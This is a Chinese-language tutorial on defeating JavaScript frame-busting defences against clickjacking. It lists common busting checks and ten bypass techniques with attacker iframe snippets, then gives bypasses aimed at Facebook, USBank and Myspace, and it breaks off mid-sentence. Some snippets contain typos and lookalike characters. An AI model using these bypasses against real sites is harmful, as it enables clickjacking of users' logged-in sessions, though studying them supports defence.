Busting Frame Busting

 

在“X-FRAME-OPTIONS”或者“浏览器防御部署”被广泛使用之前，网站防御ClickJacking的唯一方法也只能使用javascript脚本。我们把这样的javascript脚本称为-- Frame Busting，而突破“Frame Busting ”的脚本，则称为Busting Frame Busting。

在进行Busting Frame Busting之前，先列举一些常用的Frame Busting  code：

if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length>0)
if((self.parent&&!(self.parent===self))&&(self.parent.frames.length!=0))

+

top.location = self.location
top.location.href = document.location.href
top.location.href = self.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = window.location.href
top.location.href = "URL"
document.write()
top.location = location
top.location.replace(document.location)
top.location.replace(URL)
top.location.href = document.location
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
top.location.href = self.location
top.location = window.location
top.location.replace(window.location.pathname)
window.top.location = window.self.location
setTimeout(function(){document.body.innerHTML=;},1);
window.self.onload = function(evt){document.body.innerHTML=;}
var url = window.location.href; top.location.replace(url)

知道了一些常用的Frame Busting ，下面开始介绍如何进行Busting Frame Busting。

十种常见的Busting Frame Busting

1 Double framing

Victim frame busting code:
if(top.location!=self.location){
parent.location=self.location;
}

Attacker top frame:
<iframe src="attacker2.html">

Attacker sub-frame:
<iframe src="http://www.victim.com">

2 The onBeforeUnload event

<script>
window.οnbefοreunlοad=function()
{
return"Asking the user nicely";
}
</script>
<iframesrc="http://www.paypal.com">

3 onBeforeUnload ---204 Flushing

var prevent_bust=0
window.οnbefοreunlοad=
function(){kill_bust++}
setInterval(function(){
if(kill_bust>0){
kill_bust-=2;
window.top.location=
http://no-content-204.com
}
},1);
<iframe src="http://www.victim.com">

4 Exploiting the XSS filter

IE8:
Example. Victim frame busting code:
<script>
if(top!=self){
top.location=self.location;
}
</script>
Attacker:
<iframe src="http://www.victim.com/?v= <script>if>

Google Chrome:
Example. victim frame busting code:
if(top!=self){
top.location=self.location;
}
Attacker:
<iframe src="http://www.victim.com/?v= if(top+!%3D+self)+%7B+top.location%3Dself.location%3B+%7D">

5 Referrer checking problems

Consider the following code from a large retailer:
if(top.location!=location){
if(document.referrer&&document.referrer.indexOf("walmart.com")==-1)
{
top.location.replace(document.location.href);
}
}
This page can be framed by an attacker who controls a domain walmart.com.badgy.com.


6 Clobbering top.location

IE7.
Victim frame busting code:

if(top.location!=self.location){
top.location=self.location;
}
Attacker:
<script>var location="clobbered";</script>
<iframe src="http://www.victim.com">

7 IE Restricted Zone

Attacker:
<iframe src="http://www.victim.com" security="restricted"></iframe>

8 Sandbox attribute

This feature can be used to disable JavaScript in the same way as the restricted zone; however, because cookies are delivered in the subframe, clickjacking attacks can take advantage of existing sessions that the user has established.

9 Design mode

Stone [ Next generation clickjacking] showed that design mode can be turned on in the framing page ( via document.designMode), disabling JavaScript in top and sub-frame. Again, cookies are delivered to the sub-frame. Design mode is currently implemented in Firefox and IE8.

10 Mobile Sites

Unfortunately, most sites who framebust on their primary domain do not framebust their mobile sites.To make matters worse, many sites do not dierentiate sessions between the regular and the mobile site; that is, if you are logged in at www.example.com you are also logged in at mobile.example.com. This enables the attacker to clickjack the mobile site (on a desktop browser) and gain control of a fully functional site.


实际网络环境中，Busting Frame Busting将会较为复杂。

1 Facebook.com ---Shedding a Ray of Light in the
Darkness

frame-busting code:

if(top!=self){
window.document.write(" <div style=
background:black;opacity:0.5;
filter:alpha(opacity=50);
position:absolute;top:0px;left:0px;
width:9999px;height:9999px;
z-index:1000001
onClick=top.location.href=window.location.href>
</div>");
}

Busting Frame Busting:

<body style="overflo-x:hidden; border:0px; margin:0px;">
<iframe width="21800px" height="2500px" src="http://facebook.com/" frameborder="0" marginheight="0" marginwidth="0"></iframe>
<script>window.scrollTo(10200,0);</script>


2 www.USBank.com----Domain checking errors

frame-busting code:

if(self!=top){
var dom=getDom(document.referrer);
var okDom=/usbank|localhost|usbnet/; 
var matchDomain=dom.search(okDom);
if(matchDomain==-1){//bust}

(www.husbanken.no ,http://www.rusbank.org ) will be allowed to frame the page since both contain the string usbank in the domain.


3 Myspace.com----Trust problems

frame-busting code:

try{
A=!top.location.href
}catch(B){}
A=A&&!(document.referrer.match(
/^https?://[-a-z0-9.]*.google.(co.
|com.)?[a-z]+/imgres/i))
&&!(document.referrer.match(
/^https?://([^/]*.)?(myspace.com
|myspace.cn
|simsidekick.com
|levisawards.com//i));
if(A){//framebust}

By design the code allows Myspace to be framed by Google images.Google images, however,does not use frame busting.
an attacker can frame Google images and then cause Google images to frame Myspace (e.g. by issuing a speci c Google search query that leads to a Myspace page)


如何防御，如何突破，在上面的描述中都已经看到了。现在给出目前防御性最